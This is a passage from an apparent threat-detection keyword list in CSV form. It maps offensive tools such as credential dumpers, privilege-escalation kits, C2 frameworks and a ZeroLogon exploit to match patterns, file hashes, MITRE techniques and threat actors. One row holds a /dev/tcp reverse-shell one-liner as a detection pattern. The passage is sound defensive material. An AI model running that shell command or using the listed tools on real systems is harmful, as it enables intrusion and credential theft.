"*>SharpRoast<*",".{0,1000}\>SharpRoast\<.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/Lexus89/SharpPack","1","0","#companyname","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","20567" "*>SharpSAMDump<*",".{0,1000}\>SharpSAMDump\<.{0,1000}","offensive_tool_keyword","SharpSAMDump","SAM dumping via the registry in C#/.NET","T1003.002 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/jojonas/SharpSAMDump","1","0","#productname","N/A","10","1","48","8","2025-01-16T07:08:58Z","2024-05-27T10:53:27Z","20568" "*>SharpSCCM<*",".{0,1000}\>SharpSCCM\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpSCCM","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20569" "*>SharpSCCM<*",".{0,1000}\>SharpSCCM\<.{0,1000}","offensive_tool_keyword","SharpSCCM","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpSCCM","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20570" "*>SharpShares<*",".{0,1000}\>SharpShares\<.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - 
Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#productname","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","20571" "*>SharpSploit<*",".{0,1000}\>SharpSploit\<.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","20572" "*>SharpSQL<*",".{0,1000}\>SharpSQL\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20573" "*>SharpSQL<*",".{0,1000}\>SharpSQL\<.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#companyname","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","20574" 
"*>SharpSQL<*",".{0,1000}\>SharpSQL\<.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20575" "*>SharpThief<*",".{0,1000}\>SharpThief\<.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","0","#description","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","20576" "*>SharpUp<*",".{0,1000}\>SharpUp\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20577" "*>SharpUp<*",".{0,1000}\>SharpUp\<.{0,1000}","offensive_tool_keyword","SharpUp","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - 
T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20578" "*>SharpView<*",".{0,1000}\>SharpView\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpView","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20579" "*>SharpView<*",".{0,1000}\>SharpView\<.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#companyname","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","20580" "*>SharpView<*",".{0,1000}\>SharpView\<.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","Conti - APT29","Discovery","https://github.com/tevora-threat/SharpView/","1","0","#productname","N/A","10","10","1032","196","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z","20581" "*>SharpView<*",".{0,1000}\>SharpView\<.{0,1000}","offensive_tool_keyword","SharpView","executables for penetration testing 
Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpView","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20582" "*>SharpWeb<*",".{0,1000}\>SharpWeb\<.{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/StarfireLab/SharpWeb","1","0","#productname","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","20583" "*>SharpWMI<*",".{0,1000}\>SharpWMI\<.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#companyname","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","20584" "*>SharpZeroLogon<*",".{0,1000}\>SharpZeroLogon\<.{0,1000}","offensive_tool_keyword","SharpZeroLogon","exploit for CVE-2020-1472","T1210 - T1558.003 - T1078.002 - T1098 - T1003.006","TA0001 - TA0004 - TA0005 - TA0006 - TA0003","Ghost Ransomware","N/A","Exploitation tool","https://github.com/leitosama/SharpZeroLogon","1","0","#productname","N/A","10","1","27","17","2021-02-13T10:13:32Z","2021-02-13T09:44:43Z","20585" "*>Shock.exe<*",".{0,1000}\>Shock\.exe\<.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass 
using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","#originalfilename","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","20586" "*>SniffPass<*",".{0,1000}\>SniffPass\<.{0,1000}","offensive_tool_keyword","SniffPass","password monitoring software that listens to your network - capture the passwords that pass through your network adapter and display them on the screen instantly","T1040 - T1071 - T1041","TA0006 - TA0007 - TA0009","N/A","GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/password_sniffer.html","1","0","#productname","N/A","10","10","N/A","N/A","N/A","N/A","20588" "*>TakeOwnershipServiceModificationVariant<*",".{0,1000}\>TakeOwnershipServiceModificationVariant\<.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20597" "*>TcbS4uImpersonationVariant<*",".{0,1000}\>TcbS4uImpersonationVariant\<.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20598" "*>TeamFiltration.dll<*",".{0,1000}\>TeamFiltration\.dll\<.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring 
O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","20601" "*>TokenStealing<*",".{0,1000}\>TokenStealing\<.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20604" "*>Tor2web Error: *",".{0,1000}\>Tor2web\sError\:\s.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","20605" "*>Trick.exe<*",".{0,1000}\>Trick\.exe\<.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","#originalfilename","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","20606" "*>UACBypassedService<*",".{0,1000}\>UACBypassedService\<.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","20607" "*>Upload-OneDrive<*",".{0,1000}\>Upload\-OneDrive\<.{0,1000}","offensive_tool_keyword","SharpExfil","C# 
executables to extract information from target environment using OneDrive API.","T1567.002 - T1020 - T1071.001","TA0005 - TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/adm1nPanda/SharpExfil","1","0","#productname","N/A","8","1","6","1","2020-07-02T14:48:55Z","2019-07-27T05:28:40Z","20609" "*>User32LogonProcesss<*",".{0,1000}User32LogonProcesss.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://x.com/_RastaMouse/status/1747636529613197757","1","0","N/A","typo in the process name used when calling LsaRegisterLogonProcess","10","10","N/A","N/A","N/A","N/A","20610" "*>UserRightsUtil<*",".{0,1000}\>UserRightsUtil\<.{0,1000}","offensive_tool_keyword","PrivFu","manage user right without secpol.msc","T1059 - T1078","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","UserRightsUtil","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20611" "*>VeeamBackupCreds<*",".{0,1000}\>VeeamBackupCreds\<.{0,1000}","offensive_tool_keyword","SharpVeeamDecryptor","Decrypt Veeam database passwords","T1555.005 - T1003 - T1059","TA0006 - TA0005 - TA0008","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/SharpVeeamDecryptor","1","0","N/A","used by EMBARGO Ransomware","10","2","158","18","2023-11-07T14:00:47Z","2023-11-07T14:00:45Z","20612" "*>VNCPassView<*",".{0,1000}\>VNCPassView\<.{0,1000}","offensive_tool_keyword","VNCPassView","recover 
the passwords stored by the VNC tool","T1003 - T1555 - T1081","TA0006 - TA0007","N/A","GoGoogle - 8BASE","Credential Access","https://www.nirsoft.net/utils/vnc_password.html","1","0","#productname","N/A","10","10","N/A","N/A","N/A","N/A","20613" "*>Web Browser Password Viewer<*",".{0,1000}\>Web\sBrowser\sPassword\sViewer\<.{0,1000}","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. as long as the password is stored by your Web Browser.","T1003 - T1555 - T1503","TA0006 - TA0007 - TA0009","N/A","Phobos - GoGoogle - 8BASE - Kimsuky - Dispossessor - Loki","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","0","#Description","N/A","10","10","N/A","N/A","N/A","N/A","20614" "*>WebBrowserPassView<*",".{0,1000}\>WebBrowserPassView\<.{0,1000}","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. 
as long as the password is stored by your Web Browser.","T1003 - T1555 - T1503","TA0006 - TA0007 - TA0009","N/A","Phobos - GoGoogle - 8BASE - Kimsuky - Dispossessor - Loki","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","20615" "*>Welcome to BloodHound?s documentation!<*",".{0,1000}\>Welcome\sto\sBloodHound?s\sdocumentation!\<.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","20617" "*>WfpTokenDup<*",".{0,1000}\>WfpTokenDup\<.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20619" "*>winexesvc<*",".{0,1000}\>winexesvc\<.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","0","#servicename","N/A","8","8","N/A","N/A","N/A","N/A","20620" "*>WinPwnage<*",".{0,1000}\>WinPwnage\<.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - 
T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#servicename","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","20621" "*>Wireless Key View<*",".{0,1000}\>Wireless\sKey\sView\<.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1083 - T1552","TA0006 ","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","0","#productname","N/A","7","10","N/A","N/A","N/A","N/A","20625" "*0.0.0.0:2222*",".{0,1000}0\.0\.0\.0\:2222.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","20628" "*0.0.0.0:23487*",".{0,1000}0\.0\.0\.0\:23487.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","20629" "*0.0.0.0:4444*",".{0,1000}0\.0\.0\.0\:4444.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability 
Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","20630" "*0.0.0.0:4445*",".{0,1000}0\.0\.0\.0\:4445.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","20631" "*0.0.0.0:53531*",".{0,1000}0\.0\.0\.0\:53531.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","1","N/A","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","20632" "*0_evil.com_4444.exe*",".{0,1000}0_evil\.com_4444\.exe.{0,1000}","offensive_tool_keyword","TinyMet","meterpreter stager","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","CL0P - FIN7 - FIN11 - Silence group - GOLD EVERGREEN","C2","https://github.com/SherifEldeeb/TinyMet","1","1","N/A","N/A","10","10","128","43","2019-08-20T04:39:22Z","2014-05-17T13:31:55Z","20633" "*0<&196;exec 196<>/dev/tcp/*/*; sh <&196 >&196 2>&196*",".{0,1000}0\<\&196\;exec\s196\<\>\/dev\/tcp\/.{0,1000}\/.{0,1000}\;\ssh\s\<\&196\s\>\&196\s2\>\&196.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 
TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","20634" "*00_create_all_modules_test*",".{0,1000}00_create_all_modules_test.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","20636" "*00000000000000000041d00000041d9535d5979f591ae8e547c5e5743e5b64*",".{0,1000}00000000000000000041d00000041d9535d5979f591ae8e547c5e5743e5b64.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#jarm","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","20637" 
"*00000000000000000043d43d00043de2a97eabb398317329f027c66e4c1b01*",".{0,1000}00000000000000000043d43d00043de2a97eabb398317329f027c66e4c1b01.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","20638" "*00015f0ed60527ea65a612a07f73a3b8e3367eac36a94a21a73667e4a83a930b*",".{0,1000}00015f0ed60527ea65a612a07f73a3b8e3367eac36a94a21a73667e4a83a930b.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","20639" "*000417262bbfa790d2c3a9f66236dc996b8079c4eb05240301d5de17e5cf6749*",".{0,1000}000417262bbfa790d2c3a9f66236dc996b8079c4eb05240301d5de17e5cf6749.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. 
Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","20640" "*000f59e092127362057a472411b5395360cfbff686077e7741fd03ea22e12516*",".{0,1000}000f59e092127362057a472411b5395360cfbff686077e7741fd03ea22e12516.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","20643" "*001f68ac4e3ffa91b0e787586bb8382aeeb8300da5548a8802417ee6a38ff880*",".{0,1000}001f68ac4e3ffa91b0e787586bb8382aeeb8300da5548a8802417ee6a38ff880.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","20644" "*002cb66d300bfb43557d4a2857db4aa75260a07feee6ec53375d0cfb6161e2bd*",".{0,1000}002cb66d300bfb43557d4a2857db4aa75260a07feee6ec53375d0cfb6161e2bd.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","20645" "*002fa7c3b308536f94ff10852afcfbb0285608d259a43277e69751ab7db48e04*",".{0,1000}002fa7c3b308536f94ff10852afcfbb0285608d259a43277e69751ab7db48e04.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force attacks against Exchange Active Sync (EAS)","T1110 - T1078.003 - T1087.002 - T1059.001","TA0006 -TA0007 - TA0009 - TA0002 
